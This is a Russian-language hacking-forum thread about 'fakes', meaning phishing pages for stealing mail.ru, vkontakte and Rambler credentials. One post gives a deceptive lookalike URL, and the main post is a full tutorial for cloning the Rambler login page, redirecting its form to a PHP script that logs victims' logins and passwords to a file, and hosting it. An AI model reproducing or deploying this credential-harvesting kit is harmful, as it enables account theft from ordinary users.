Консультация с хакером

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.



Fake - все о нем

Сообщений 1 страница 5 из 5

1

Фейк это типичный вариант махинаций со ссылками, чаще всего используется для кражи cookies и паролей mail.ru, vkontakte.ru и тп.
Пример:

Код:
http://r2.mail.ru/clb_win.mail.ru/win.rmaill.ru/_cgi-bin/

на самом деле ссылка превращается в win.rmaill.ru/_cgi-bin/ ))

0

2

http://valenok2.ru/screen1.gif

0

3

http://free-one.ru/mail.php
сервис отправки анонимных сообщений на мыло)

0

4

Изготовление

Давайте рассмотрим фейк на примере рамблера.

1. Открываем rambler в браузере OPERA .

Открыли?! Чего ждем сохраняем!
ФАЙЛ -> Сохранить как -> Html файл с рисунками. И называем index.html.

2. Открываем смотрим как сохранилась. Если без проблем - идем далее, иначе смотрим ошибки.

Открываем index.htm в блокноте или Notepad++(что наиболее удобно) . Ищем строчку

PHP код:
<form action="http://mail.rambler.ru/script/auth.cgi" method="POST">

В параметре action мы должны заменить адресс скрипта авторизации(это адресс, куда клиент перенаправляется после нажатия кнопки войти).

Получится:

PHP код:
<form action="redirect.php" method="POST">

ищем поля ввода логина и пароля:

PHP код:
<input type="text" name="login" value="" size="10" tabindex="2" class="input100">
<input type="password" name="passw" size="10" tabindex="2" class="input100">

Здесь нужно обратить внимание на имена ПОЛЕЙ
Это name='login';
И name='passw';

3. redirect.php:

PHP код:
<?php
$f=fopen("pass.log","at");
flock($f,2);
fputs($f,"Логин: ".$_POST['login']."\n");
fputs($f,"Пароль ".$_POST['passw']."\n"."---------------\n");
flock($f,3);
fclose($f);
?>
<script>
document.location.href="http://google.ru";
</script>

$_POST['login']
$_POST['passw'] - это поля которое мы будем сохранять.

т.е что у нас в файле index.htm (имена) мы их сюда вписываем.
pass.log - файл куда будемсохранять пароли.

PHP код:
<script> document.location.href="http://google.ru"; </script>
-google.ru это адресс куды перенаправят юзера после сохранения пароля.

5. Осталось залить на хостинг с php и выставить права(chmod) на файлы:

redirect.php - 755
pass.log - 777

Спасибо за внимание.

автор: brasco2k

0

5

inname3 это не фейк - это фигня, с майлом покруче)

0